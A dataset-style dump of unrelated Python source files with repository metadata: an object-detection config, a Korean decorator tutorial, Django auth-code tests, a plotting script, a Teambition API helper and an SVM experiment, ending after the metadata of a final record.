test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/bbox_r50_grid_center_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
[
"23736866+Kenneth-Wong@users.noreply.github.com"
] |
23736866+Kenneth-Wong@users.noreply.github.com
|
a9caebabdf171d0f736e2d36d431084f893a43ac
|
8fa040a06a728ccf8f31e91f39973bb4e98b3122
|
/Python_basic/07_python_decorator.py
|
eb32b59849ccdcdc8dd2bcbecbc16d794c4ab5d2
|
[] |
no_license
|
Souuul/python
|
155ca8efe0b86c97d07863b3e024394217211f01
|
7143dcc35b98d0f1c1fe8c52d0aeb99ee5b42050
|
refs/heads/master
| 2023-01-06T04:37:32.208248
| 2020-11-10T14:24:41
| 2020-11-10T14:24:41
| 283,421,555
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,072
|
py
|
'''
decorator
decorator의 사전적 의미는 장식가, 도배업자
python에서 Decorator는 기존의 코드에 여러가지 기능을 추가하는 python구문이라고 이해하면 편해요!
Closure
first class에 대해서 알아보았어요
first class function(일급함수) : 파이썬은 일급함수를 지원하는 언어
1. 파이썬의 함수는 변수에 저장할 수 있어요!
2. 함수의 인자로 함수를 이용할 수 있어요! > decorator / 프로그램의 확정성 생산성을 높이기 위함
3. 함수의 결과값(리턴값)으로 함수를 이용할 수 있어요! > closure
'''
# # def my_outer_func(func):
# # def my_inner_func():
# # func()
# # return my_inner_func #해당함수 코드를 리턴 // ()해당함수의 실행의 결과를 리턴
# #
# # def my_func():
# # return print("my_func() 함수가 호출되었어요!!")
# #
# # decorated_my_func = my_outer_func(my_func)
# # decorated_my_func() #my_func() 함수가 호출되었어요!!
# # my_func() #my_func() 함수가 호출되었어요!!
#
# import time
#
# def my_outer_func(func): # 목적은 my_func의 기능을 확장시키기 위함!
# def my_inner_func():
# print("{} 함수 수행 시간을 계산합니다.".format(func.__name__))
# start = time.time() # 1970년 1월 1일 0시 0분 0초 0
# func()
# end = time.time()
# print("함수 수행 시간은 {} 계산합니다.".format(start-end))
# return my_inner_func #해당함수 코드를 리턴 // ()해당함수의 실행의 결과를 리턴
#
# # def my_func():
# # return print("my_func() 함수가 호출되었어요!!")
#
# # decorated_my_func = my_outer_func(my_func)
# # decorated_my_func() #my_func() 함수가 호출되었어요!! // 함수자체의 기능을 수정하지 않고 함수의 기능을 수정할 수 있
# # my_func() #my_func() 함수가 호출되었어요!!
#
# # closure vs decorator // 새로운 기능 추가되는 것을 리턴하는것
#
# @my_outer_func # decorator 기능을 추가한 my_func를 리턴
# def my_func():
# return print("my_func() 함수가 호출되었어요!!")
#
#
# my_func()
# '''
# my_func 함수 수행 시간을 계산합니다.
# my_func() 함수가 호출되었어요!!
# 함수 수행 시간은 -5.7220458984375e-06 계산합니다.
# '''
#############################################################
# def print_user_name(*args): # 인자로 들어온 사람의 이름을 출력 / 정해지지 않는
# # args는 tuple로 받아요!
# for name in args:
# print(name)
# print_user_name("홍길동", "신사임당") #이렇게도 가능
# print_user_name("홍길동", "신사임당", "유관순") #이렇게도 가능
'''
홍길동
신사임당
홍길동
신사임당
유관순
'''
# def print_user_name(**kwargs): # 관용적으로 **kwargs 표기
# # kkargs는 dict로 받아요!
# for name in kwargs.values(): # key, value로 구분
# #print(kwargs.get(name)) # get 을 통해서 추출가능
# print(name)
# print_user_name(name1 = "홍길동", name2= "신사임당") #이렇게도 가능
## 받는 함수의 인자의 개수가 다를경우
# def my_outer(func):
# def my_inner(*args, **kwargs): # decorator의 인자의 개수를 예측하기 힘들기에 *args, **kwargs 를 적용하여 인자문제 해결
# print("데코레이터!! 시작")
# func(*args, **kwargs) # *args, **kwargs
# print("데코레이터!! 끝")
#
# return my_inner
#
# @my_outer
# def my_func():
# print("이것은 소리없는 아우성!!")
# @my_outer
# def my_add(x,y):
# print("두 수의 합은 : {}".format(x+y))
#
#
# my_func()
# '''
# 데코레이터!! 시작
# 이것은 소리없는 아우성!!
# 데코레이터!! 끝
# '''
#
# my_add(1,2)
#
# '''
# 데코레이터!! 시작
# 두 수의 합은 : 3
# 데코레이터!! 끝
# '''
# 블로그!!
## 티스토리추천
##http://moon9342.github.io
|
[
"hans53400@naver.com"
] |
hans53400@naver.com
|
56949c4db28de69646a0608078ccaa2021987d61
|
4de645802568e0317654e75afbe6d79db69317e5
|
/pythonx/snippet_helpers.py
|
53c12d4bac09f6abed674f1b50d73b5819df9624
|
[] |
no_license
|
liiil825/dotvim
|
25da0b499f0b94c69d26336d9917e3019e4c8262
|
40dea6d8970b02a8d141909207ff72bb1e9723c8
|
refs/heads/master
| 2023-04-05T22:31:48.199682
| 2023-03-29T08:39:04
| 2023-03-29T08:39:04
| 34,794,542
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 135
|
py
|
def fraction( a, b ):
try:
return "%.1f" % ( float( a ) / float( b ) )
except ( ValueError, ZeroDivisionError ):
return "ERR"
|
[
"40129878@qq.com"
] |
40129878@qq.com
|
152edf169d78c30351a491fd1d68dccb08de71c1
|
a9ee8b29cc753cbcf3167e2741c779ad43ab22a3
|
/api/wsgi.py
|
6a23d3e1ea9a1a6b3e64ad17e9afb8029d5cf9b3
|
[
"MIT"
] |
permissive
|
josecolinapy/fifa-21-api
|
f76f06679be9f696f03ce0f3e6e5be5fc5c4c0f4
|
5ed75b60a8c302ad7d4fde04a07312de18c10b1e
|
refs/heads/main
| 2023-03-18T17:03:31.483890
| 2021-03-14T15:04:56
| 2021-03-14T15:04:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 388
|
py
|
"""
WSGI config for api project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings.settings')
application = get_wsgi_application()
|
[
"othmaane59100@live.fr"
] |
othmaane59100@live.fr
|
e54bf365ae9ed61261b9902b687769361a488445
|
dfbc64250dfdecbf70377b6cf6549e04521795ec
|
/codingALGO/test_solve.py
|
02d9f40f03d44be312992c89f5619a2bc3a41fa2
|
[] |
no_license
|
sagarrshd/mm
|
60a939d09cc0cef3ce191a3e3b7d387fbcbbcca5
|
7fb9287c567507a5e6a05b6367bc21b15d03d984
|
refs/heads/master
| 2023-04-18T10:11:28.492485
| 2021-05-01T19:14:15
| 2021-05-01T19:14:15
| 363,487,969
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 247
|
py
|
import pytest
from solve import count_sum_lists
def test1():
A = [1, 2, 8]
k = 1000
B = 2
res = count_sum_lists(A, k, B)
assert res == 3
def test2():
A = [5, 17, 10000, 11]
k = 1000
B = 4
res = count_sum_lists(A, k, B)
assert res == 0
|
[
"sagarrshd@gmail.com"
] |
sagarrshd@gmail.com
|
ae1a109105467ef139d1001e81abe371486a106d
|
15e0928f1fad3c4a21823bdce4bc4e76d3d2801a
|
/teambitionHelp.py
|
1fe4180389083c096e89e89d77983d59e77ec661
|
[] |
no_license
|
HuangJT/teambitionApi
|
a610b70ffa1492804f9b63afe57c844ceb7ece70
|
12494bba65246f1e548792bc3a02b87e05f59a81
|
refs/heads/master
| 2022-07-05T21:59:55.998780
| 2020-05-11T02:43:58
| 2020-05-11T02:43:58
| 262,920,368
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,090
|
py
|
# -*- coding: UTF-8 -*-
import requests
import json
import pymysql
from pymysql import cursors
import time
import urllib
import codecs
from datetime import datetime, date, timedelta
# pip install PyJWT
import jwt
import sys
# reload(sys)
# sys.setdefaultencoding('utf8')
from settings import SETTINGS
class TeambitionHelp:
__tbAppId = "" # api token
__tbSecrect = ""
__accessToken = ""
def __init__(self):
self.__tbAppId = SETTINGS["TB_APP_ID"]
self.__tbSecrect = SETTINGS["TB_APP_SECRECT"]
expire_time = int(time.time() + 3600) # 1 小时后超时
encoded = jwt.encode({'_appId': self.__tbAppId, 'exp': expire_time}, self.__tbSecrect, algorithm='HS256')
# print(encoded)
encoded_str = str(encoded, encoding='utf-8')
# print(encoded_str)
self.__accessToken = encoded_str
def __getAuthHeaders(self):
return {'Authorization': 'Bearer '+ self.__accessToken,'X-Tenant-Id':SETTINGS['TB_ORG_ID'],'X-Tenant-Type':'organization'}
def logf(self,content):
logContent = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) + " " + content + "\n"
logFile = codecs.open(SETTINGS['LOG_FILE'], 'a', encoding='utf-8')
logFile.write(logContent)
print(logContent)
logFile.close()
def getOrgInfo(self):
res = requests.get(SETTINGS["URL_TB_GET_ORG_INFO"] + "?orgId="+ SETTINGS["TB_ORG_ID"],headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
# resJson = json.loads(res.content.decode("utf-8"))
def getTaskGroup(self,groupId):
res = requests.get(SETTINGS["URL_TB_GET_TASK_GROUP"] + "?projectId="+ groupId,headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
resJson = json.loads(res.content.decode("utf-8"))
return resJson.get("result")
def getTaskList(self,taskListId):
res = requests.get(SETTINGS["URL_TB_GET_TASK_LIST"] + "?tasklistId="+ taskListId,headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
resJson = json.loads(res.content.decode("utf-8"))
return resJson.get("result")
def getTasksByTql(self,tql):
res = requests.post(SETTINGS["URL_TB_GET_TASK_TQL"] ,json={"tql":tql},headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
resJson = json.loads(res.content.decode("utf-8"))
return resJson.get("result")
def main():
teambitionHelp = TeambitionHelp()
# groupList = teambitionHelp.getTaskGroup(SETTINGS["TB_PROJECT_ID_DEVELOP"])
# for group in groupList:
# print(group.get("name"))
# # print(group.get("tasklistIds"))
# for taskListId in group.get("tasklistIds"):
# print(teambitionHelp.getTaskList(taskListId))
tasks = teambitionHelp.getTasksByTql("projectId=" + SETTINGS["TB_PROJECT_ID_DEVELOP"] + " AND id = 5e78xxxxxxx7880 " )
for task in tasks:
print(task)
print("\n")
if __name__ == '__main__':
main()
|
[
"huangjiantao@qinsilk.com"
] |
huangjiantao@qinsilk.com
|
14af6f90daa0b86d6aa3eb173dd22c4267364a3e
|
500a32cfae24028417215a79146c04d8cd0f12a3
|
/Figures/FigureS4.py
|
05fbe12a5889a12b91b07fcc4905e52285789c73
|
[] |
no_license
|
daphnar/URA_paper
|
bd431296d97908483db2f5be2d472074fcd03fe7
|
c08eba53c63ef7a410797491c60dd6dd0975ad62
|
refs/heads/master
| 2021-07-31T20:13:47.490159
| 2021-07-27T21:27:06
| 2021-07-27T21:27:06
| 232,321,758
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,727
|
py
|
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
import os
import matplotlib as mpl
#from Unicorn.Figures import nature_guidline_utils
from dark import cmap_map
from URA_paper.Figures import nature_guidline_utils
sns.set_style("ticks", {'axes.edgecolor': 'black'})
pd.set_option('display.width', 1000)
np.set_printoptions(precision=4, linewidth=200)
FIGURES_DIR = '/net/mraid08/export/jafar/Microbiome/Analyses/Unicorn/Cohort_Paper/revision_Analyses/figures'
params = {
'axes.labelsize': 10,
'font.size': 10,
'legend.fontsize': 10,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'figure.dpi': 300,
'axes.linewidth': 0.5,
}
fontsize = 10
plt.rcParams.update(params)
fig = plt.figure(figsize=(nature_guidline_utils.two_columns(),
nature_guidline_utils.full_page()*0.8*0.2), dpi=300) # m2inch(165)
import matplotlib.gridspec as gridspec
green=(47./255,142./255,52./255)
violet = (106./255,111./255,205./255)
two_colors = [violet,green]#colors_rgb[-2:]
axdrest_grid_bottom = gridspec.GridSpec(1,3,wspace=0.7,width_ratios=[1./3,1./3,1./3])
ax__age_saturation = plt.subplot(axdrest_grid_bottom[0,0])
ax__hba1c_saturation = plt.subplot(axdrest_grid_bottom[0,1])
ax__bmi_saturation = plt.subplot(axdrest_grid_bottom[0,2])
plt.sca(ax__age_saturation)
plt.text(-.53, 1.15, 'a', ha='center', va='center', transform=ax__age_saturation.transAxes, fontsize=16)
saturation_df=pd.read_csv(os.path.join(FIGURES_DIR,'Figures - age_saturation_US.csv'))
saturation_df.sort_values(by='cohort_size',inplace=True)
saturation_df.loc[:,['mean_pearson','mean_std']] = saturation_df.loc[:,['mean_pearson','mean_std']].mul(100)
ax__age_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson'],
yerr=saturation_df['mean_std'],color=two_colors[0])
saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']] = saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']].mul(100)
ax__age_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson_linear'],
yerr=saturation_df['mean_std_linear'],color=two_colors[1])
ax__age_saturation.tick_params(top='off',right='off',pad=2,labelsize=fontsize)
ax__age_saturation.yaxis.set_ticks_position('left')
ax__age_saturation.xaxis.set_ticks_position('bottom')
ax__age_saturation.spines['right'].set_visible(False)
ax__age_saturation.spines['top'].set_visible(False)
ax__age_saturation.set_xlim([0,20000])
ax__age_saturation.set_xticks([0,10000,20000])
plt.ylim(0,20)
ax__age_saturation.set_yticks([0,10,20])
plt.xlabel('Sample size')
plt.ylabel('age $R^{2}$ (%)')
plt.legend(['GBDT','Ridge'],bbox_to_anchor=(1.15, 0.0),frameon=False,loc=4)
plt.sca(ax__hba1c_saturation)
plt.text(-0.2, 1.15, 'b', ha='center', va='center', transform=ax__hba1c_saturation.transAxes, fontsize=16)
saturation_df=pd.read_csv(os.path.join(FIGURES_DIR,'Figures - hba1c_saturation_US.csv'))
saturation_df.sort_values(by='cohort_size',inplace=True)
saturation_df.loc[:,['mean_pearson','mean_std']] = saturation_df.loc[:,['mean_pearson','mean_std']].mul(100)
ax__hba1c_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson'],
yerr=saturation_df['mean_std'],color=two_colors[0])
saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']] = saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']].mul(100)
ax__hba1c_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson_linear'],
yerr=saturation_df['mean_std_linear'],color=two_colors[1])
ax__hba1c_saturation.tick_params(top='off',right='off',pad=2,labelsize=fontsize)
ax__hba1c_saturation.yaxis.set_ticks_position('left')
ax__hba1c_saturation.xaxis.set_ticks_position('bottom')
ax__hba1c_saturation.spines['right'].set_visible(False)
ax__hba1c_saturation.spines['top'].set_visible(False)
ax__hba1c_saturation.set_xlim([0,16000])
ax__hba1c_saturation.set_xticks([0,7500,15000])
plt.ylim(0,10)
ax__hba1c_saturation.set_yticks([0,5,10])#,20])
plt.xlabel('Sample size')
plt.ylabel('HbA1C% $R^{2}$ (%)')
plt.sca(ax__bmi_saturation)
plt.text(-.25, 1.15, 'c', ha='center', va='center', transform=ax__bmi_saturation.transAxes, fontsize=16)
saturation_df=pd.read_csv(os.path.join(FIGURES_DIR,'Figures - bmi_saturation_US.csv'))
saturation_df.sort_values(by='cohort_size',inplace=True)
saturation_df.loc[:,['mean_pearson','mean_std']] = saturation_df.loc[:,['mean_pearson','mean_std']].mul(100)
ax__bmi_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson'],
yerr=saturation_df['mean_std'],color=two_colors[0])
saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']] = saturation_df.loc[:,['mean_pearson_linear','mean_std_linear']].mul(100)
ax__bmi_saturation.errorbar(saturation_df['cohort_size'],saturation_df['mean_pearson_linear'],
yerr=saturation_df['mean_std_linear'],color=two_colors[1])
ax__bmi_saturation.tick_params(top='off',right='off',pad=2,labelsize=fontsize)
ax__bmi_saturation.yaxis.set_ticks_position('left')
ax__bmi_saturation.xaxis.set_ticks_position('bottom')
ax__bmi_saturation.spines['right'].set_visible(False)
ax__bmi_saturation.spines['top'].set_visible(False)
ax__bmi_saturation.set_xlim([0,20000])
ax__bmi_saturation.set_xticks([0,10000,20000])
ax__bmi_saturation.set_yticks([0,5,10,15])
plt.xlabel('Sample size')
# plt.ylabel('')
plt.ylabel('BMI $R^{2}$ (%)')
plt.ylim(0,15)
plt.savefig(os.path.join(FIGURES_DIR, 'figureS_4.pdf'), bbox_inches='tight', format='pdf')
plt.savefig(os.path.join(FIGURES_DIR, 'figureS_4.png'), bbox_inches='tight', format='png')
|
[
"aaaa85Al"
] |
aaaa85Al
|
7df75a268c13f4de545db13ec51df02cd9cdbda5
|
ddcc89dc88961f37d50c0f9d893f265bf34afdb3
|
/test/test_simple_module_pass.py
|
f6be33ae365cbfb62819b6d08a8740fcd1ff5120
|
[
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"NCSA",
"LicenseRef-scancode-public-domain"
] |
permissive
|
mulle-nat/property-syntax-modernizer
|
f351319314a0216e5e241fa03f9d95a3764a6590
|
93445534221840d0df6cfb2d2f4ceb73f37ac962
|
refs/heads/master
| 2020-08-07T08:57:02.149734
| 2019-10-07T12:46:11
| 2019-10-07T12:46:11
| 213,381,270
| 0
| 0
|
Unlicense
| 2019-10-07T13:11:51
| 2019-10-07T12:47:05
|
C++
|
UTF-8
|
Python
| false
| false
| 442
|
py
|
import sys, unittest
from tools import SamplesTestCase
OUTPUT_FOR_GLOBALS = '''\
Found global named "gfloat": type = float*
Found global named "gppfloat": type = float***
Found global named "gint": type = i32*
'''
PROG = 'simple_module_pass'
class TestSimpleModulePass(SamplesTestCase):
def test_on_globals(self):
self.assertSampleOutput([PROG], 'globals.ll', OUTPUT_FOR_GLOBALS)
if __name__ == '__main__':
unittest.main()
|
[
"eliben@gmail.com"
] |
eliben@gmail.com
|
244651275300889c2f7a9b4928af9c1940ad6614
|
4be9a5bdb8e051001b78c8f127ccc1a7f85c14e7
|
/bugzilla/migrations/0002_auto_20170205_1515.py
|
6b518a7b30a1bea8b1cda0d937046f6fe0febbe5
|
[] |
no_license
|
quentin-david/heimdall
|
f72a85606e7ab53683df2023ef5eaba762198211
|
84a429ee52e1891bc2ee4eb07a084dff209c789c
|
refs/heads/master
| 2021-01-21T10:26:28.895663
| 2017-07-21T19:19:46
| 2017-07-21T19:19:46
| 83,432,596
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 638
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-05 15:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bugzilla', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='bugzilla',
options={'ordering': ['-date_update']},
),
migrations.AlterField(
model_name='bugzilla',
name='state',
field=models.CharField(choices=[('open', 'Open'), ('close', 'Close'), ('info', 'Info')], max_length=15),
),
]
|
[
"david@hemdgsa01.local.lan"
] |
david@hemdgsa01.local.lan
|
848b91f09b40a31a3b9e5798f08cb9dc68841a53
|
bd8b3d43a465b26f0d86a3007b41d6a3c22345a6
|
/svsutils/iterators/__init__.py
|
6bde41920adb8b8446e1ce7254e5cba9a485b1fe
|
[] |
no_license
|
nathanin/svsutils
|
aed5d361ff4716390e093d6bab6bf3cc6dd69a9b
|
5789c3e589ce9244b21a24d6cdc3909bc4e04517
|
refs/heads/master
| 2020-06-25T06:06:37.019860
| 2019-12-17T05:08:35
| 2019-12-17T05:08:35
| 199,225,548
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 122
|
py
|
from .iterator_factory import PythonIterator, TensorflowIterator
__all__ = [
'PythonIterator',
'TensorflowIterator'
]
|
[
"ing.nathany@gmail.com"
] |
ing.nathany@gmail.com
|
0187aa1b8fa9854b1f253d952bda031992f4b423
|
20a3cc1106fa86fc2d45cd1728cc87d5db97e1f7
|
/old/pddbm/bug3.py
|
7d0a81d444b74c37e2e621dc7a08f50608b54c18
|
[] |
no_license
|
sarahboufelja54/galatea
|
f5664f0b3117629b2c5bbe078a1bd52bb5e359e6
|
002a9f2905868be25b71770190fb2d5eda11c861
|
refs/heads/master
| 2020-12-04T13:45:07.697189
| 2018-12-12T16:27:09
| 2018-12-12T16:27:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,268
|
py
|
import numpy as np
from sklearn.svm import SVC
import time
rng = np.random.RandomState([1,2,3])
m = 1000
n = 1000
X = rng.randn(m,n)
w = rng.randn(n)
b = rng.randn(1)
y = (np.dot(X,w) + b ) > 0
t1 = time.time()
svm = SVC(kernel = 'linear', C = 1.0).fit(X,y)
t2 = time.time()
print 'train time ',t2 - t1
t1 = time.time()
y1 = svm.predict(X)
t2 = time.time()
print 'predict time ',t2 - t1
print '# support vectors:',svm.n_support_
print 'predict time per support vector:',(t2-t1)/float(svm.n_support_.sum())
coef = svm.coef_[0,:]
orig_coef = svm.coef_
t1 = time.time()
f = - np.dot(X, orig_coef.T) + svm.intercept_
y2 = f < 0
print y.shape
print y2.shape
print (y2 == y).shape
quit(-1)
t2 = time.time()
print 'dot product time',t2 -t1
print 'class 1 prevalence ',y.mean()
print 'predict accuracy ',(y1 == y).mean()
print 'dot product accuracy ',(y2 == y).mean()
print 'predict and dot agreement rate',(y1 == y2).mean()
coefs = svm.dual_coef_
assert len(coefs.shape) == 2
assert coefs.shape[0] == 1
coefs = coefs[0,:]
w = np.dot(svm.support_vectors_.T, coefs)
assert np.allclose(w,-coef)
f = np.dot(X,w) + b
y3 = (f < 0)
print 'agreement rate with my method: ',(y3 == y1).mean()
print 'dot prod between sklearn coef_ and my coef_: ',np.dot(w,svm.coef_[0,:])
|
[
"goodfellow.ian@gmail.com"
] |
goodfellow.ian@gmail.com
|
7b0c4083d029a92441704bd296c1aef0ebbf84f2
|
2d4ab8e3ea9fd613ec0ae0c1956b68874c9b5f06
|
/tests/pipelines/cnv_calling/test_xhmm_pca.py
|
e9dc13feb4ca41c6220481e9e7105e1e72bce443
|
[] |
no_license
|
biocodices/paip
|
4abd39cbbd372a68592da87177c70c403d5a661d
|
040a62c11e5bae306e2de4cc3e0a78772ee580b3
|
refs/heads/master
| 2021-01-17T20:48:28.642255
| 2019-07-26T14:30:58
| 2019-07-26T14:30:58
| 62,604,413
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,013
|
py
|
from unittest.mock import MagicMock
import pytest
from paip.pipelines.cnv_calling.xhmm_pca import XhmmPCA, EmptyInputMatrix
@pytest.fixture
def task(cohort_task_factory):
return cohort_task_factory(XhmmPCA)
def test_check_matrix(task):
# NOTE: Run this test before the next one, because the tested method
# check_matrix() will be mocked in test_run().
empty_matrix = pytest.helpers.file('empty_matrix.txt')
with pytest.raises(EmptyInputMatrix):
task.check_matrix(empty_matrix)
def test_run(task, mock_rename):
check_matrix = MagicMock()
task.check_matrix = check_matrix
task.run()
check_matrix.assert_called_once()
(command, ), kwargs = task.run_command.call_args
assert 'xhmm --PCA' in command
assert 'DATA.filtered_centered.RD.txt' in command
assert 'DATA-temp.RD_PCA' in command
assert mock_rename.call_count == 3
assert 'DATA-temp.RD_PCA' in mock_rename.call_args[0][0]
assert 'DATA.RD_PCA' in mock_rename.call_args[0][1]
|
[
"juanmaberros@gmail.com"
] |
juanmaberros@gmail.com
|
ec2f894e96dc3e63e0a4c74c3de67eab7985c8bc
|
c713ba772c663849b2339ea13f3a6e407058bfc7
|
/auth/tests.py
|
796d49f3d5c9abb762a26263a4e564faf0e0c7bd
|
[
"MIT"
] |
permissive
|
aprosvetova/vas3k.club
|
3aaf31cec36a3283336e6da391766632091c1fcc
|
e667b91bb855a256bcb7760fb1555ebbb1079744
|
refs/heads/master
| 2022-12-22T16:08:27.487072
| 2020-09-14T21:59:44
| 2020-09-14T21:59:44
| 297,010,352
| 2
| 0
|
MIT
| 2020-09-20T05:43:25
| 2020-09-20T05:43:24
| null |
UTF-8
|
Python
| false
| false
| 5,452
|
py
|
from datetime import datetime, timedelta
import django
from django.conf import settings
from django.test import TestCase
django.setup() # todo: how to run tests from PyCharm without this workaround?
from auth.models import Code
from club.exceptions import RateLimitException, InvalidCode
from users.models.user import User
class ModelCodeTests(TestCase):
@classmethod
def setUpTestData(cls):
# Set up data for the whole TestCase
cls.new_user: User = User.objects.create(
email="testemail@xx.com",
membership_started_at=datetime.now() - timedelta(days=5),
membership_expires_at=datetime.now() + timedelta(days=5),
)
def test_create_code_positive(self):
recipient = "success@a.com"
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
self.assertEqual(code.recipient, recipient)
self.assertEqual(self.new_user.id, code.user_id)
self.assertEqual(len(code.code), settings.AUTH_CODE_LENGTH)
self.assertAlmostEqual(code.expires_at.second, (datetime.utcnow() + timedelta(minutes=15)).second, delta=5)
def test_create_code_ratelimit(self):
recipient = "ratelimit@a.com"
# override the AUTH_MAX_CODE_TIMEDELTA setting
with self.settings(AUTH_MAX_CODE_COUNT=1):
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
self.assertEqual(len(code.code), settings.AUTH_CODE_LENGTH)
# second attempt should rise exception
with self.assertRaises(RateLimitException):
Code.create_for_user(user=self.new_user, recipient=recipient)
def test_create_code_reset_ratelimit(self):
recipient = "ratelimit@a.com"
with self.settings(AUTH_MAX_CODE_COUNT=1):
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
self.assertEqual(len(code.code), settings.AUTH_CODE_LENGTH)
# move creation time to deep enough past
code.created_at = datetime.utcnow() - settings.AUTH_MAX_CODE_TIMEDELTA - timedelta(seconds=1)
code.save()
# no exception raises
code = Code.create_for_user(user=self.new_user, recipient=recipient)
self.assertEqual(len(code.code), settings.AUTH_CODE_LENGTH)
def test_check_code_positive(self):
recipient = "success@a.com"
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
user = Code.check_code(recipient=recipient, code=code.code)
self.assertEqual(user.id, self.new_user.id)
def test_check_code_which_is_incorrect(self):
with self.assertRaises(InvalidCode):
Code.check_code(recipient="failed@xxx.com", code="failed")
def test_check_code_twice(self):
recipient = "success@a.com"
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
Code.check_code(recipient=recipient, code=code.code) # activate first time
with self.assertRaises(InvalidCode):
Code.check_code(recipient=recipient, code=code.code)
def test_check_code_which_is_not_last_one(self):
# issue few codes
recipient = "fewcodes@a.com"
code1: Code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
code2: Code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
# for stability test runs
code2.created_at -= timedelta(seconds=1)
code2.save()
with self.assertRaises(InvalidCode):
Code.check_code(recipient=recipient, code=code2.code)
# first one is successful
user = Code.check_code(recipient=recipient, code=code1.code)
self.assertEqual(user.id, self.new_user.id)
def test_check_code_which_is_for_other_user(self):
recipient_right = "true-user@a.com"
recipient_wrong = "wrong-user@x.com"
code = Code.create_for_user(user=self.new_user, recipient=recipient_right, length=settings.AUTH_CODE_LENGTH)
with self.assertRaises(InvalidCode):
Code.check_code(recipient=recipient_wrong, code=code.code)
def test_check_code_when_exceeded_attempts_count(self):
recipient = "exceeded_attemts@a.com"
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
# override the AUTH_MAX_CODE_TIMEDELTA setting
with self.settings(AUTH_MAX_CODE_ATTEMPTS=1):
# first attempt
with self.assertRaises(InvalidCode):
Code.check_code(recipient=recipient, code="wrong_attempt")
# second attempt should rise ratelimit exception
with self.assertRaises(RateLimitException):
Code.check_code(recipient=recipient, code=code.code)
def test_check_code_which_is_expired(self):
recipient = "expired@a.com"
code = Code.create_for_user(user=self.new_user, recipient=recipient, length=settings.AUTH_CODE_LENGTH)
code.expires_at = datetime.utcnow() - timedelta(seconds=1)
code.save()
with self.assertRaises(InvalidCode):
Code.check_code(recipient=recipient, code=code.code)
|
[
"noreply@github.com"
] |
aprosvetova.noreply@github.com
|
2eeceb42de2ea27fde10e7e6d5c08914488ee6c5
|
b4da2201d2df789e28472aeded28720d5269ade5
|
/Komodo-Edit-7/lib/mozilla/components/koLintService.py
|
4e543d65bce81928a8d67a2192aeee69c031327d
|
